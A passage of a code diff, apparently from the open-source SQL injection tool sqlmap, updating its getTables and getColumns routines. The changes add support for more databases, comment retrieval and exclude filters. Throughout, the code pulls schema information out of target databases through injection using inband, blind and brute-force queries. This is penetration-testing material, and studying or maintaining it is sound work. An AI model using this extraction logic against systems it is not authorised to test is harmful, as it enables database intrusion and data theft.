sorted(dbs)) - if len(dbs) < 2 and ("%s," % condition) in query: - query = query.replace("%s," % condition, "", 1) + if len(dbs) < 2 and ("%s," % condition) in query: + query = query.replace("%s," % condition, "", 1) - values = inject.getValue(query, blind=False, time=False) + if query: + values = inject.getValue(query, blind=False, time=False) if not isNoneValue(values): - values = filter(None, arrayizeValue(values)) + values = [_ for _ in arrayizeValue(values) if _] if len(values) > 0 and not isListLike(values[0]): values = [(dbs[0], _) for _ in values] for db, table in filterPairValues(values): - db = safeSQLIdentificatorNaming(db) - table = safeSQLIdentificatorNaming(table, True) + table = unArrayizeValue(table) - if db not in kb.data.cachedTables: - kb.data.cachedTables[db] = [table] - else: - kb.data.cachedTables[db].append(table) + if not isNoneValue(table): + db = safeSQLIdentificatorNaming(db) + table = safeSQLIdentificatorNaming(table, True).strip() + + if conf.getComments: + _ = queries[Backend.getIdentifiedDbms()].table_comment + if hasattr(_, "query"): + if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE): + query = _.query % (unsafeSQLIdentificatorNaming(db.upper()), 
unsafeSQLIdentificatorNaming(table.upper())) + else: + query = _.query % (unsafeSQLIdentificatorNaming(db), unsafeSQLIdentificatorNaming(table)) + + comment = unArrayizeValue(inject.getValue(query, blind=False, time=False)) + if not isNoneValue(comment): + infoMsg = "retrieved comment '%s' for table '%s'" % (comment, unsafeSQLIdentificatorNaming(table)) + if METADB_SUFFIX not in db: + infoMsg += " in database '%s'" % unsafeSQLIdentificatorNaming(db) + logger.info(infoMsg) + else: + warnMsg = "on %s it is not " % Backend.getIdentifiedDbms() + warnMsg += "possible to get table comments" + singleTimeWarnMessage(warnMsg) + + if db not in kb.data.cachedTables: + kb.data.cachedTables[db] = [table] + else: + kb.data.cachedTables[db].append(table) if not kb.data.cachedTables and isInferenceAvailable() and not conf.direct: for db in dbs: if conf.excludeSysDbs and db in self.excludeDbsList: - infoMsg = "skipping system database '%s'" % db + infoMsg = "skipping system database '%s'" % unsafeSQLIdentificatorNaming(db) logger.info(infoMsg) + continue + if conf.exclude and re.search(conf.exclude, db, re.I) is not None: + infoMsg = "skipping database '%s'" % unsafeSQLIdentificatorNaming(db) + singleTimeLogMessage(infoMsg) continue - infoMsg = "fetching number of tables for " - infoMsg += "database '%s'" % unsafeSQLIdentificatorNaming(db) - logger.info(infoMsg) + for _query, _count in ((rootQuery.blind.query, rootQuery.blind.count), (getattr(rootQuery.blind, "query2", None), getattr(rootQuery.blind, "count2", None))): + if _query is None: + break - if Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD, DBMS.MAXDB, DBMS.ACCESS): - query = rootQuery.blind.count - else: - query = rootQuery.blind.count % unsafeSQLIdentificatorNaming(db) + infoMsg = "fetching number of tables for " + infoMsg += "database '%s'" % unsafeSQLIdentificatorNaming(db) + logger.info(infoMsg) - count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + if Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.FIREBIRD, DBMS.MAXDB, DBMS.ACCESS, DBMS.MCKOI, DBMS.EXTREMEDB): + query = _count % unsafeSQLIdentificatorNaming(db) + else: + query = _count - if count == 0: - warnMsg = "database '%s' " % unsafeSQLIdentificatorNaming(db) - warnMsg += "appears to be empty" - logger.warn(warnMsg) - continue + count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - elif not isNumPosStrValue(count): - warnMsg = "unable to retrieve the number of " - warnMsg += "tables for database '%s'" % unsafeSQLIdentificatorNaming(db) - logger.warn(warnMsg) - continue + if count == 0: + warnMsg = "database '%s' " % unsafeSQLIdentificatorNaming(db) + warnMsg += "appears to be empty" + logger.warning(warnMsg) + break - tables = [] + elif not isNumPosStrValue(count): + warnMsg = "unable to retrieve the number of " + warnMsg += "tables for database '%s'" % unsafeSQLIdentificatorNaming(db) + singleTimeWarnMessage(warnMsg) + continue - plusOne = Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2) - indexRange = getLimitRange(count, plusOne=plusOne) + tables = [] - for index in indexRange: - if Backend.isDbms(DBMS.SYBASE): - query = rootQuery.blind.query % (db, (kb.data.cachedTables[-1] if kb.data.cachedTables else " ")) - elif Backend.getIdentifiedDbms() in (DBMS.MAXDB, DBMS.ACCESS): - query = rootQuery.blind.query % (kb.data.cachedTables[-1] if kb.data.cachedTables else " ") - elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD): - 
query = rootQuery.blind.query % index - else: - query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(db), index) + plusOne = Backend.getIdentifiedDbms() in PLUS_ONE_DBMSES + indexRange = getLimitRange(count, plusOne=plusOne) - table = unArrayizeValue(inject.getValue(query, union=False, error=False)) - if not isNoneValue(table): - kb.hintValue = table - table = safeSQLIdentificatorNaming(table, True) - tables.append(table) + for index in indexRange: + if Backend.isDbms(DBMS.SYBASE): + query = _query % (db, (kb.data.cachedTables[-1] if kb.data.cachedTables else " ")) + elif Backend.getIdentifiedDbms() in (DBMS.MAXDB, DBMS.ACCESS, DBMS.MCKOI, DBMS.EXTREMEDB): + query = _query % (kb.data.cachedTables[-1] if kb.data.cachedTables else " ") + elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD): + query = _query % index + elif Backend.getIdentifiedDbms() in (DBMS.HSQLDB, DBMS.INFORMIX, DBMS.FRONTBASE, DBMS.VIRTUOSO): + query = _query % (index, unsafeSQLIdentificatorNaming(db)) + else: + query = _query % (unsafeSQLIdentificatorNaming(db), index) + + table = unArrayizeValue(inject.getValue(query, union=False, error=False)) + + if not isNoneValue(table): + kb.hintValue = table + table = safeSQLIdentificatorNaming(table, True) + tables.append(table) + + if tables: + kb.data.cachedTables[db] = tables + + if conf.getComments: + for table in tables: + _ = queries[Backend.getIdentifiedDbms()].table_comment + if hasattr(_, "query"): + if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE): + query = _.query % (unsafeSQLIdentificatorNaming(db.upper()), unsafeSQLIdentificatorNaming(table.upper())) + else: + query = _.query % (unsafeSQLIdentificatorNaming(db), unsafeSQLIdentificatorNaming(table)) + + comment = unArrayizeValue(inject.getValue(query, union=False, error=False)) + if not isNoneValue(comment): + infoMsg = "retrieved comment '%s' for table '%s'" % (comment, unsafeSQLIdentificatorNaming(table)) + if METADB_SUFFIX not in db: + infoMsg += " in database '%s'" % unsafeSQLIdentificatorNaming(db) + logger.info(infoMsg) + else: + warnMsg = "on %s it is not " % Backend.getIdentifiedDbms() + warnMsg += "possible to get table comments" + singleTimeWarnMessage(warnMsg) - if tables: - kb.data.cachedTables[db] = tables - else: - warnMsg = "unable to retrieve the table names " - warnMsg += "for database '%s'" % unsafeSQLIdentificatorNaming(db) - logger.warn(warnMsg) + break + else: + warnMsg = "unable to retrieve the table names " + warnMsg += "for database '%s'" % unsafeSQLIdentificatorNaming(db) + logger.warning(warnMsg) if isNoneValue(kb.data.cachedTables): kb.data.cachedTables.clear() @@ -353,19 +451,19 @@ def getTables(self, bruteForce=None): if bruteForce is None: logger.error(errMsg) return self.getTables(bruteForce=True) - else: + elif not conf.search: raise SqlmapNoneDataException(errMsg) else: for db, tables in kb.data.cachedTables.items(): kb.data.cachedTables[db] = sorted(tables) if tables else tables if kb.data.cachedTables: - for db in kb.data.cachedTables.keys(): + for db in kb.data.cachedTables: kb.data.cachedTables[db] = list(set(kb.data.cachedTables[db])) return kb.data.cachedTables - def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None): + def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMode=False): self.forceDbmsEnum() if conf.db is None or conf.db == CURRENT_DB: @@ -373,15 +471,20 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None): warnMsg = "missing database parameter. 
sqlmap is going " warnMsg += "to use the current database to enumerate " warnMsg += "table(s) columns" - logger.warn(warnMsg) + logger.warning(warnMsg) conf.db = self.getCurrentDb() + if not conf.db: + errMsg = "unable to retrieve the current " + errMsg += "database name" + raise SqlmapNoneDataException(errMsg) + elif conf.db is not None: - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): + if Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES: conf.db = conf.db.upper() - if ',' in conf.db: + if ',' in conf.db: errMsg = "only one database name is allowed when enumerating " errMsg += "the tables' columns" raise SqlmapMissingMandatoryOptionException(errMsg) @@ -389,23 +492,26 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None): conf.db = safeSQLIdentificatorNaming(conf.db) if conf.col: - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): + if Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES: conf.col = conf.col.upper() - colList = conf.col.split(",") + colList = conf.col.split(',') else: colList = [] + if conf.exclude: + colList = [_ for _ in colList if re.search(conf.exclude, _, re.I) is None] + for col in colList: colList[colList.index(col)] = safeSQLIdentificatorNaming(col) - colList = filter(None, colList) + colList = [_ for _ in colList if _] if conf.tbl: - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): + if Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES: conf.tbl = conf.tbl.upper() - tblList = conf.tbl.split(",") + tblList = conf.tbl.split(',') else: self.getTables() @@ -413,31 +519,36 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None): if conf.db in kb.data.cachedTables: tblList = kb.data.cachedTables[conf.db] else: - tblList = kb.data.cachedTables.values() + tblList = list(six.itervalues(kb.data.cachedTables)) - if isinstance(tblList[0], (set, tuple, list)): + if tblList and isListLike(tblList[0]): tblList = tblList[0] tblList = list(tblList) - else: - errMsg = "unable to retrieve the tables " - errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) + elif not conf.search: + errMsg = "unable to retrieve the tables" + if METADB_SUFFIX not in conf.db: + errMsg += " in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) raise SqlmapNoneDataException(errMsg) + else: + return kb.data.cachedColumns - for tbl in tblList: - tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl, True) + if conf.exclude: + tblList = [_ for _ in tblList if re.search(conf.exclude, _, re.I) is None] + + tblList = filterNone(safeSQLIdentificatorNaming(_, True) for _ in tblList) if bruteForce is None: if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: - errMsg = "information_schema not available, " - errMsg += "back-end DBMS is MySQL < 5.0" - logger.error(errMsg) + warnMsg = "information_schema not available, " + warnMsg += "back-end DBMS is MySQL < 5.0" + logger.warning(warnMsg) bruteForce = True - elif Backend.isDbms(DBMS.ACCESS): - errMsg = "cannot retrieve column names, " - errMsg += "back-end DBMS is Access" - logger.error(errMsg) + elif Backend.getIdentifiedDbms() in (DBMS.ACCESS, DBMS.MCKOI, DBMS.EXTREMEDB, DBMS.RAIMA): + warnMsg = "cannot retrieve column names, " + warnMsg += "back-end DBMS is %s" % Backend.getIdentifiedDbms() + singleTimeWarnMessage(warnMsg) bruteForce = True if bruteForce: @@ -449,7 +560,7 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None): resumeAvailable = True break - if resumeAvailable or colList: + if resumeAvailable and not 
(conf.freshQueries and not colList): columns = {} for column in colList: @@ -467,12 +578,17 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None): return kb.data.cachedColumns - message = "do you want to use common column existence check? %s" % ("[Y/n/q]" if Backend.getIdentifiedDbms() in (DBMS.ACCESS,) else "[y/N/q]") - test = readInput(message, default="Y" if "Y" in message else "N") + if kb.choices.columnExists is None: + message = "do you want to use common column existence check? %s" % ("[Y/n/q]" if Backend.getIdentifiedDbms() in (DBMS.ACCESS, DBMS.MCKOI, DBMS.EXTREMEDB) else "[y/N/q]") + kb.choices.columnExists = readInput(message, default='Y' if 'Y' in message else 'N').upper() - if test[0] in ("n", "N"): - return - elif test[0] in ("q", "Q"): + if kb.choices.columnExists == 'N': + if dumpMode and colList: + kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = {safeSQLIdentificatorNaming(tbl, True): dict((_, None) for _ in colList)} + return kb.data.cachedColumns + else: + return None + elif kb.choices.columnExists == 'Q': raise SqlmapUserQuitException else: return columnExists(paths.COMMON_COLUMNS) @@ -485,7 +601,7 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None): if conf.db is not None and len(kb.data.cachedColumns) > 0 \ and conf.db in kb.data.cachedColumns and tbl in \ kb.data.cachedColumns[conf.db]: - infoMsg = "fetched tables' columns on " + infoMsg = "fetched table columns from " infoMsg += "database '%s'" % unsafeSQLIdentificatorNaming(conf.db) logger.info(infoMsg) @@ -497,7 +613,7 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None): if len(colList) > 0: if colTuple: _, colCondParam = colTuple - infoMsg += "like '%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList)) + infoMsg += "LIKE '%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList)) else: colCondParam = "='%s'" infoMsg += "'%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList)) @@ -505,30 +621,49 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None): condQueryStr = "%%s%s" % colCondParam condQuery = " AND (%s)" % " OR ".join(condQueryStr % (condition, unsafeSQLIdentificatorNaming(col)) for col in sorted(colList)) - infoMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl) - infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) - logger.info(infoMsg) - - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): + if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.MONETDB, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CUBRID, DBMS.CACHE, DBMS.FRONTBASE, DBMS.VIRTUOSO, DBMS.CLICKHOUSE, DBMS.SNOWFLAKE): query = rootQuery.inband.query % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db)) query += condQuery - elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): + + if Backend.isDbms(DBMS.MYSQL) and Backend.isFork(FORK.DRIZZLE): + query = re.sub("column_type", "data_type", query, flags=re.I) + + elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE, DBMS.MIMERSQL, DBMS.SNOWFLAKE): query = rootQuery.inband.query % (unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(conf.db.upper())) query += condQuery + elif Backend.isDbms(DBMS.MSSQL): query = rootQuery.inband.query % (conf.db, conf.db, conf.db, conf.db, conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split(".")[-1]) query += 
condQuery.replace("[DB]", conf.db) + elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD): - query = rootQuery.inband.query % tbl + query = rootQuery.inband.query % unsafeSQLIdentificatorNaming(tbl) - values = inject.getValue(query, blind=False, time=False) + elif Backend.isDbms(DBMS.INFORMIX): + query = rootQuery.inband.query % (conf.db, conf.db, conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl)) + query += condQuery + + if dumpMode and colList: + values = [(_,) for _ in colList] + else: + infoMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl) + if METADB_SUFFIX not in conf.db: + infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) + logger.info(infoMsg) + + values = None + + if values is None: + values = inject.getValue(query, blind=False, time=False) + if values and isinstance(values[0], six.string_types): + values = [values] if Backend.isDbms(DBMS.MSSQL) and isNoneValue(values): index, values = 1, [] while True: - query = rootQuery.inband.query2 % (conf.db, tbl, index) + query = rootQuery.inband.query2 % (conf.db, unsafeSQLIdentificatorNaming(tbl), index) value = unArrayizeValue(inject.getValue(query, blind=False, time=False)) if isNoneValue(value) or value == " ": @@ -538,21 +673,56 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None): index += 1 if Backend.isDbms(DBMS.SQLITE): - parseSqliteTableSchema(unArrayizeValue(values)) + if dumpMode and colList: + if conf.db not in kb.data.cachedColumns: + kb.data.cachedColumns[conf.db] = {} + kb.data.cachedColumns[conf.db][safeSQLIdentificatorNaming(conf.tbl, True)] = dict((_, None) for _ in colList) + else: + parseSqliteTableSchema(unArrayizeValue(values)) + elif not isNoneValue(values): table = {} columns = {} for columnData in values: if not isNoneValue(columnData): + columnData = [unArrayizeValue(_) for _ in columnData] name = safeSQLIdentificatorNaming(columnData[0]) if name: + if conf.getComments: + _ = queries[Backend.getIdentifiedDbms()].column_comment + if hasattr(_, "query"): + if Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES: + query = _.query % (unsafeSQLIdentificatorNaming(conf.db.upper()), unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(name.upper())) + else: + query = _.query % (unsafeSQLIdentificatorNaming(conf.db), unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(name)) + + comment = unArrayizeValue(inject.getValue(query, blind=False, time=False)) + if not isNoneValue(comment): + infoMsg = "retrieved comment '%s' for column '%s'" % (comment, name) + logger.info(infoMsg) + else: + warnMsg = "on %s it is not " % Backend.getIdentifiedDbms() + warnMsg += "possible to get column comments" + singleTimeWarnMessage(warnMsg) + if len(columnData) == 1: columns[name] = None else: + key = int(columnData[1]) if isinstance(columnData[1], six.string_types) and columnData[1].isdigit() else columnData[1] if Backend.isDbms(DBMS.FIREBIRD): - columnData[1] = FIREBIRD_TYPES.get(columnData[1], columnData[1]) + columnData[1] = FIREBIRD_TYPES.get(key, columnData[1]) + elif Backend.isDbms(DBMS.ALTIBASE): + columnData[1] = ALTIBASE_TYPES.get(key, columnData[1]) + elif Backend.isDbms(DBMS.INFORMIX): + notNull = False + if isinstance(key, int) and key > 255: + key -= 256 + notNull = True + columnData[1] = INFORMIX_TYPES.get(key, columnData[1]) + if notNull: + columnData[1] = "%s NOT NULL" % columnData[1] columns[name] = columnData[1] @@ -567,8 +737,8 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None): if conf.db is 
not None and len(kb.data.cachedColumns) > 0 \ and conf.db in kb.data.cachedColumns and tbl in \ kb.data.cachedColumns[conf.db]: - infoMsg = "fetched tables' columns on " - infoMsg += "database '%s'" % conf.db + infoMsg = "fetched table columns from " + infoMsg += "database '%s'" % unsafeSQLIdentificatorNaming(conf.db) logger.info(infoMsg) return {conf.db: kb.data.cachedColumns[conf.db]} @@ -579,7 +749,7 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None): if len(colList) > 0: if colTuple: _, colCondParam = colTuple - infoMsg += "like '%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList)) + infoMsg += "LIKE '%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList)) else: colCondParam = "='%s'" infoMsg += "'%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList)) @@ -587,63 +757,94 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None): condQueryStr = "%%s%s" % colCondParam condQuery = " AND (%s)" % " OR ".join(condQueryStr % (condition, unsafeSQLIdentificatorNaming(col)) for col in sorted(colList)) - infoMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl) - infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) - logger.info(infoMsg) - - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): + if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.MONETDB, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CUBRID, DBMS.CACHE, DBMS.FRONTBASE, DBMS.VIRTUOSO, DBMS.CLICKHOUSE, DBMS.SNOWFLAKE): query = rootQuery.blind.count % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db)) query += condQuery - elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): + elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE, DBMS.MIMERSQL): query = rootQuery.blind.count % (unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(conf.db.upper())) query += condQuery elif Backend.isDbms(DBMS.MSSQL): - query = rootQuery.blind.count % (conf.db, conf.db, \ - unsafeSQLIdentificatorNaming(tbl).split(".")[-1]) + query = rootQuery.blind.count % (conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split(".")[-1]) query += condQuery.replace("[DB]", conf.db) elif Backend.isDbms(DBMS.FIREBIRD): - query = rootQuery.blind.count % (tbl) + query = rootQuery.blind.count % unsafeSQLIdentificatorNaming(tbl) + query += condQuery + + elif Backend.isDbms(DBMS.INFORMIX): + query = rootQuery.blind.count % (conf.db, conf.db, conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl)) query += condQuery elif Backend.isDbms(DBMS.SQLITE): - query = rootQuery.blind.query % tbl - value = unArrayizeValue(inject.getValue(query, union=False, error=False)) - parseSqliteTableSchema(value) - return kb.data.cachedColumns + if dumpMode and colList: + if conf.db not in kb.data.cachedColumns: + kb.data.cachedColumns[conf.db] = {} + kb.data.cachedColumns[conf.db][safeSQLIdentificatorNaming(conf.tbl, True)] = dict((_, None) for _ in colList) + else: + query = rootQuery.blind.query % unsafeSQLIdentificatorNaming(tbl) + value = unArrayizeValue(inject.getValue(query, union=False, error=False)) + parseSqliteTableSchema(unArrayizeValue(value)) - count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + return kb.data.cachedColumns table = {} columns = {} - if not isNumPosStrValue(count): - if Backend.isDbms(DBMS.MSSQL): - count, index, values = 0, 1, [] - 
while True: - query = rootQuery.blind.query3 % (conf.db, tbl, index) - value = unArrayizeValue(inject.getValue(query, union=False, error=False)) - if isNoneValue(value) or value == " ": - break - else: - columns[safeSQLIdentificatorNaming(value)] = None - index += 1 - - if not columns: - errMsg = "unable to retrieve the %scolumns " % ("number of " if not Backend.isDbms(DBMS.MSSQL) else "") - errMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl) - errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) - logger.error(errMsg) - continue + if dumpMode and colList: + count = 0 + for value in colList: + columns[safeSQLIdentificatorNaming(value)] = None + else: + infoMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl) + if METADB_SUFFIX not in conf.db: + infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) + logger.info(infoMsg) + + count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + + if not isNumPosStrValue(count): + if Backend.isDbms(DBMS.MSSQL): + count, index, values = 0, 1, [] + while True: + query = rootQuery.blind.query3 % (conf.db, unsafeSQLIdentificatorNaming(tbl), index) + value = unArrayizeValue(inject.getValue(query, union=False, error=False)) + + if isNoneValue(value) or value == " ": + break + else: + columns[safeSQLIdentificatorNaming(value)] = None + index += 1 + + if not columns: + errMsg = "unable to retrieve the %scolumns " % ("number of " if not Backend.isDbms(DBMS.MSSQL) else "") + errMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl) + if METADB_SUFFIX not in conf.db: + errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) + logger.error(errMsg) + continue for index in getLimitRange(count): - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): + if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CUBRID, DBMS.CACHE, DBMS.FRONTBASE, DBMS.VIRTUOSO): query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db)) query += condQuery field = None - elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): + elif Backend.isDbms(DBMS.H2): + query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db)) + query = query.replace(" ORDER BY ", "%s ORDER BY " % condQuery) + field = None + elif Backend.isDbms(DBMS.MIMERSQL): + query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(conf.db.upper())) + query = query.replace(" ORDER BY ", "%s ORDER BY " % condQuery) + field = None + elif Backend.isDbms(DBMS.SNOWFLAKE): + query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(conf.db.upper())) + field = None + elif Backend.getIdentifiedDbms() in (DBMS.MONETDB, DBMS.CLICKHOUSE): + query = safeStringFormat(rootQuery.blind.query, (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db), index)) + field = None + elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE): query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(conf.db.upper())) query += condQuery field = None @@ -652,29 +853,62 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None): query += condQuery.replace("[DB]", conf.db) field = condition.replace("[DB]", conf.db) elif Backend.isDbms(DBMS.FIREBIRD): - query = 
rootQuery.blind.query % (tbl) + query = rootQuery.blind.query % unsafeSQLIdentificatorNaming(tbl) query += condQuery field = None + elif Backend.isDbms(DBMS.INFORMIX): + query = rootQuery.blind.query % (index, conf.db, conf.db, conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl)) + query += condQuery + field = condition query = agent.limitQuery(index, query, field, field) column = unArrayizeValue(inject.getValue(query, union=False, error=False)) if not isNoneValue(column): + if conf.getComments: + _ = queries[Backend.getIdentifiedDbms()].column_comment + if hasattr(_, "query"): + if Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES: + query = _.query % (unsafeSQLIdentificatorNaming(conf.db.upper()), unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(column.upper())) + else: + query = _.query % (unsafeSQLIdentificatorNaming(conf.db), unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(column)) + + comment = unArrayizeValue(inject.getValue(query, union=False, error=False)) + if not isNoneValue(comment): + infoMsg = "retrieved comment '%s' for column '%s'" % (comment, column) + logger.info(infoMsg) + else: + warnMsg = "on %s it is not " % Backend.getIdentifiedDbms() + warnMsg += "possible to get column comments" + singleTimeWarnMessage(warnMsg) + if not onlyColNames: - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): + if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE, DBMS.FRONTBASE, DBMS.VIRTUOSO, DBMS.CLICKHOUSE): query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl), column, unsafeSQLIdentificatorNaming(conf.db)) - elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): + elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE, DBMS.MIMERSQL): query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl.upper()), column, unsafeSQLIdentificatorNaming(conf.db.upper())) elif Backend.isDbms(DBMS.MSSQL): - query = rootQuery.blind.query2 % (conf.db, conf.db, conf.db, conf.db, column, conf.db, - conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split(".")[-1]) + query = rootQuery.blind.query2 % (conf.db, conf.db, conf.db, conf.db, column, conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split(".")[-1]) elif Backend.isDbms(DBMS.FIREBIRD): - query = rootQuery.blind.query2 % (tbl, column) + query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl), column) + elif Backend.isDbms(DBMS.INFORMIX): + query = rootQuery.blind.query2 % (conf.db, conf.db, conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl), column) + elif Backend.isDbms(DBMS.MONETDB): + query = rootQuery.blind.query2 % (column, unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db)) colType = unArrayizeValue(inject.getValue(query, union=False, error=False)) + key = int(colType) if hasattr(colType, "isdigit") and colType.isdigit() else colType if Backend.isDbms(DBMS.FIREBIRD): - colType = FIREBIRD_TYPES.get(colType, colType) + colType = FIREBIRD_TYPES.get(key, colType) + elif Backend.isDbms(DBMS.INFORMIX): + notNull = False + if isinstance(key, int) and key > 255: + key -= 256 + notNull = True + colType = INFORMIX_TYPES.get(key, colType) + if notNull: + colType = "%s NOT NULL" % colType column = safeSQLIdentificatorNaming(column) columns[column] = colType @@ -691,61 +925,62 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None): if not kb.data.cachedColumns: warnMsg = "unable to 
